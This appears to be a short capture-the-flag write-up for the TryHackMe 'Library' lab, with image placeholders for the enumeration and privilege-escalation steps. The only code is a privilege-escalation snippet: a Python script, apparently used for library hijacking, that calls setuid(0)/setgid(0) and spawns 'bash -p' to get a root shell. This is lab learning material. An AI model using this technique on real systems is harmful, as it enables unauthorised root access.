rootšŸ’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

CTF-: TRYHACKME

Lab-: Library


image


Enumeration

image

image

image

image


Privesc with Python Library

image

#!/usr/bin/env python
import os
import zipfile
import os
os.setuid(0);os.setgid(0);os.system("bash -p")

image

image


THANKS FOR READING!!!